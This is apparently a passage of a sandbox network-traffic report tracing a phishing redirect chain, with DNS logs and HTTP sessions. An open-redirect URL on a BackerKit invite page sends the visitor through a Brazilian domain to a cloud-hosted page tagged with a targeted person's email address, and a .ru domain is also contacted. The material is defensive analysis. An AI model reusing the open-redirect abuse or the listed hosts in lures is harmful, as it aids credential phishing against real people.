                                                                          Oct 29, 2024 16:51:02.568684101 CET5773353192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:51:02.626038074 CET53577331.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:02.703422070 CET53525291.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:07.990794897 CET5353541162.159.36.2192.168.2.16
                                                                          Oct 29, 2024 16:51:08.632078886 CET5531253192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:51:08.641138077 CET53553121.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:41.330300093 CET6342553192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:51:41.390507936 CET53634251.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:41.434350014 CET5672753192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:51:41.434370041 CET5577253192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:51:41.441695929 CET53567271.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:41.441770077 CET53557721.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:46.039855003 CET138138192.168.2.16192.168.2.255
                                                                          Oct 29, 2024 16:51:47.456640005 CET4929953192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:51:47.464250088 CET53492991.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:52:47.507930994 CET5158253192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:52:47.515199900 CET53515821.1.1.1192.168.2.16
                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                          Oct 29, 2024 16:50:44.805543900 CET192.168.2.161.1.1.1c269(Port unreachable)Destination Unreachable
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Oct 29, 2024 16:50:43.518152952 CET192.168.2.161.1.1.10xbf9cStandard query (0)lumen.backerkit.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:43.518299103 CET192.168.2.161.1.1.10x8233Standard query (0)lumen.backerkit.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:44.509875059 CET192.168.2.161.1.1.10x550Standard query (0)rahul-garg-lcatterton-com.athuselevadores.com.brA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:44.510034084 CET192.168.2.161.1.1.10x9f8cStandard query (0)rahul-garg-lcatterton-com.athuselevadores.com.br65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:45.755732059 CET192.168.2.161.1.1.10x5899Standard query (0)ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:45.755872965 CET192.168.2.161.1.1.10xb9d6Standard query (0)ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.391447067 CET192.168.2.161.1.1.10xf2bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.391609907 CET192.168.2.161.1.1.10xf5eeStandard query (0)www.google.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.735846996 CET192.168.2.161.1.1.10xb4d4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.735985994 CET192.168.2.161.1.1.10x220Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.736350060 CET192.168.2.161.1.1.10x8e2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.736479044 CET192.168.2.161.1.1.10x4847Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:48.966933966 CET192.168.2.161.1.1.10xeb75Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:48.970081091 CET192.168.2.161.1.1.10x405bStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.843085051 CET192.168.2.161.1.1.10xc72aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.843229055 CET192.168.2.161.1.1.10x5638Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.866415977 CET192.168.2.161.1.1.10x8276Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.866592884 CET192.168.2.161.1.1.10x71dfStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:51:02.568537951 CET192.168.2.161.1.1.10x2944Standard query (0)axelkirchhoffh.ruA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:02.568684101 CET192.168.2.161.1.1.10xc53dStandard query (0)axelkirchhoffh.ru65IN (0x0001)false
                                                                          Oct 29, 2024 16:51:08.632078886 CET192.168.2.161.1.1.10xf655Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.330300093 CET192.168.2.161.1.1.10x1bc1Standard query (0)axelkirchhoffh.ruA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.434350014 CET192.168.2.161.1.1.10x79a0Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.434370041 CET192.168.2.161.1.1.10xc119Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:47.456640005 CET192.168.2.161.1.1.10x6ae4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:52:47.507930994 CET192.168.2.161.1.1.10xf0dbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Oct 29, 2024 16:50:43.529512882 CET1.1.1.1192.168.2.160xbf9cNo error (0)lumen.backerkit.com172.67.7.211A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:43.529512882 CET1.1.1.1192.168.2.160xbf9cNo error (0)lumen.backerkit.com104.22.19.140A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:43.529512882 CET1.1.1.1192.168.2.160xbf9cNo error (0)lumen.backerkit.com104.22.18.140A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:43.536453009 CET1.1.1.1192.168.2.160x8233No error (0)lumen.backerkit.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:44.741038084 CET1.1.1.1192.168.2.160x550No error (0)rahul-garg-lcatterton-com.athuselevadores.com.br107.161.183.172A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:45.911484957 CET1.1.1.1192.168.2.160x5899No error (0)ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com217.142.168.1A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.399782896 CET1.1.1.1192.168.2.160xf5eeNo error (0)www.google.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.400333881 CET1.1.1.1192.168.2.160xf2bNo error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.744313955 CET1.1.1.1192.168.2.160xb4d4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.744313955 CET1.1.1.1192.168.2.160xb4d4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.744326115 CET1.1.1.1192.168.2.160x220No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.744535923 CET1.1.1.1192.168.2.160x8e2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.744535923 CET1.1.1.1192.168.2.160x8e2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:47.746468067 CET1.1.1.1192.168.2.160x4847No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:48.974390030 CET1.1.1.1192.168.2.160xeb75No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:48.974390030 CET1.1.1.1192.168.2.160xeb75No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:48.978337049 CET1.1.1.1192.168.2.160x405bNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.851560116 CET1.1.1.1192.168.2.160xc72aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.851560116 CET1.1.1.1192.168.2.160xc72aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.851876020 CET1.1.1.1192.168.2.160x5638No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.874258041 CET1.1.1.1192.168.2.160x71dfNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.874299049 CET1.1.1.1192.168.2.160x8276No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:50:49.874299049 CET1.1.1.1192.168.2.160x8276No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:02.626038074 CET1.1.1.1192.168.2.160xc53dNo error (0)axelkirchhoffh.ru65IN (0x0001)false
                                                                          Oct 29, 2024 16:51:02.703422070 CET1.1.1.1192.168.2.160x2944No error (0)axelkirchhoffh.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:02.703422070 CET1.1.1.1192.168.2.160x2944No error (0)axelkirchhoffh.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:08.641138077 CET1.1.1.1192.168.2.160xf655Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.390507936 CET1.1.1.1192.168.2.160x1bc1No error (0)axelkirchhoffh.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.390507936 CET1.1.1.1192.168.2.160x1bc1No error (0)axelkirchhoffh.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.441695929 CET1.1.1.1192.168.2.160x79a0No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.441695929 CET1.1.1.1192.168.2.160x79a0No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.441695929 CET1.1.1.1192.168.2.160x79a0No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.441695929 CET1.1.1.1192.168.2.160x79a0No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.441695929 CET1.1.1.1192.168.2.160x79a0No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.441770077 CET1.1.1.1192.168.2.160xc119No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:41.441770077 CET1.1.1.1192.168.2.160xc119No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:51:47.464250088 CET1.1.1.1192.168.2.160x6ae4No error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                                          Oct 29, 2024 16:52:47.515199900 CET1.1.1.1192.168.2.160xf0dbNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                          • lumen.backerkit.com
                                                                          • rahul-garg-lcatterton-com.athuselevadores.com.br
                                                                          • ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
                                                                          • https:
                                                                            • cdnjs.cloudflare.com
                                                                            • challenges.cloudflare.com
                                                                            • axelkirchhoffh.ru
                                                                          • fs.microsoft.com
                                                                          • slscr.update.microsoft.com
                                                                          • fe3cr.delivery.mp.microsoft.com
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.1649699172.67.7.2114436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:44 UTC765OUTGET /invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br HTTP/1.1
                                                                          Host: lumen.backerkit.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:44 UTC1172INHTTP/1.1 302 Found
                                                                          Date: Tue, 29 Oct 2024 15:50:44 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1730217044&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=GuzlyqznzaIBvJbXR9gXrY6QDKRW4wVm8AP8%2B5fJw1I%3D"}]}
                                                                          Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1730217044&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=GuzlyqznzaIBvJbXR9gXrY6QDKRW4wVm8AP8%2B5fJw1I%3D
                                                                          Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                          Status: 302 Found
                                                                          Cache-Control: no-cache
                                                                          Vary: Origin
                                                                          Strict-Transport-Security: max-age=0; includeSubDomains
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          X-Xss-Protection: 0
                                                                          X-Request-Id: 3dfe31c0-f341-4453-9626-3c8544f8a5d4
                                                                          Location: //rahul-garg-lcatterton-com.athuselevadores.com.br
                                                                          X-Download-Options: noopen
                                                                          X-Greetings: We're hiring! Want to work with us? Email hello@backerkit.com
                                                                          X-Runtime: 0.051705
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          2024-10-29 15:50:44 UTC1034INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 72 65 6d 65 6d 62 65 72 5f 61 63 63 6f 75 6e 74 5f 74 6f 6b 65 6e 3d 65 79 4a 66 63 6d 46 70 62 48 4d 69 4f 6e 73 69 62 57 56 7a 63 32 46 6e 5a 53 49 36 49 6c 63 78 63 33 68 4e 56 45 45 77 54 55 52 4e 4d 55 35 57 4d 48 4e 4a 62 55 59 78 59 32 31 57 63 32 46 58 4f 58 64 52 52 7a 46 32 57 57 31 73 63 32 46 59 55 6a 56 5a 56 31 4a 32 54 47 31 4f 64 6d 4a 54 53 58 4e 4a 61 6b 55 7a 54 58 70 42 65 55 31 55 59 33 64 4f 52 46 46 31 54 58 70 6e 65 55 39 45 53 54 52 4f 65 55 70 6b 49 69 77 69 5a 58 68 77 49 6a 6f 69 4d 6a 41 79 4e 43 30 78 4d 53 30 79 4e 6c 51 78 4e 6a 6f 31 4d 44 6f 30 4e 43 34 7a 4f 44 4a 61 49 69 77 69 63 48 56 79 49 6a 6f 69 59 32 39 76 61 32 6c 6c 4c 6e 4a 6c 62 57 56 74 59 6d 56 79 58 32 46 6a 59 32 39 31
                                                                          Data Ascii: Set-Cookie: remember_account_token=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ilcxc3hNVEEwTURNMU5WMHNJbUYxY21Wc2FXOXdRRzF2WW1sc2FYUjVZV1J2TG1OdmJTSXNJakUzTXpBeU1UY3dORFF1TXpneU9ESTROeUpkIiwiZXhwIjoiMjAyNC0xMS0yNlQxNjo1MDo0NC4zODJaIiwicHVyIjoiY29va2llLnJlbWVtYmVyX2FjY291
                                                                          2024-10-29 15:50:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.1649701107.161.183.1724436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:45 UTC691OUTGET / HTTP/1.1
                                                                          Host: rahul-garg-lcatterton-com.athuselevadores.com.br
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:45 UTC351INHTTP/1.1 302 Moved Temporarily
                                                                          Date: Tue, 29 Oct 2024 15:50:47 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Location: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html#9rahul@garg.lcatterton.com
                                                                          Content-Length: 0
                                                                          Content-Type: text/html; charset=UTF-8


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.1649706217.142.168.14436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:47 UTC755OUTGET /n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html HTTP/1.1
                                                                          Host: ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:47 UTC1010INHTTP/1.1 200 OK
                                                                          accept-ranges: bytes
                                                                          Content-Length: 6376
                                                                          content-md5: eCAYFyWEutVPplZY0LKNRA==
                                                                          last-modified: Mon, 28 Oct 2024 19:15:04 GMT
                                                                          etag: dfd71a9e-bc0f-4464-90a6-9a00407648d9
                                                                          version-id: 60cc233c-b4d9-4cb1-b3b8-45bdaea42e2b
                                                                          storage-tier: Standard
                                                                          Content-Type: text/html
                                                                          connection: close
                                                                          date: Tue, 29 Oct 2024 15:50:47 GMT
                                                                          opc-request-id: xsp-1:o5BmkmPyCzgF4xi4t4wq6Sg-iuPlhJMZwRRZxWxr7jaf2jN42zXopALnvUwkNjuU
                                                                          x-api-id: native
                                                                          x-content-type-options: nosniff
                                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-methods: POST,PUT,GET,HEAD,DELETE,OPTIONS
                                                                          access-control-allow-credentials: true
                                                                          access-control-expose-headers: accept-ranges,access-control-allow-credentials,access-control-allow-methods,access-control-allow-origin,connection,content-length,content-md5,content-type,date,etag,last-modified,opc-client-info,opc-request-id,storage-tier,strict-transport-security,version-id,x-api-id,x-content-type-options
                                                                          2024-10-29 15:50:47 UTC6376INData Raw: 3c 68 74 6d 6c 3e 0d 0a 0a 0a 09 3c 68 65 61 64 3e 0d 0a 0a 0a 09 09 09 3c 6d 65 74 61 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 09 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 0a 0a 20 20 3c 6d 65 74 61 09 09 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 09 09 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 20 09 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 20 3c 2f 73 63 72 69 70
                                                                          Data Ascii: <html><head><meta name="viewport" content="width=device-width,initial-scale=1.0"> <metaname="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"> </scrip


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.1649709104.17.25.144436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:48 UTC608OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:48 UTC954INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:48 GMT
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: W/"5eb03e2d-bb78"
                                                                          Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                          cf-cdnjs-via: cfworker/kv
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 427538
                                                                          Expires: Sun, 19 Oct 2025 15:50:48 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SyqUB%2Fg5adCnGqXVDIPrSEfE092XnP9UgYov78ArfSuiEUFYHe64UEK0jpMn73On5tSeEayChxVu660cw23jlW76G5JBBNg6zr86ziZdIIrAxipgke9bAcOgEulK5bYbgv8atwWQ"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452c92d543156-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:48 UTC415INData Raw: 37 62 66 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                          Data Ascii: 7bf7!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                          2024-10-29 15:50:48 UTC1369INData Raw: 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65
                                                                          Data Ascii: ow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.ge
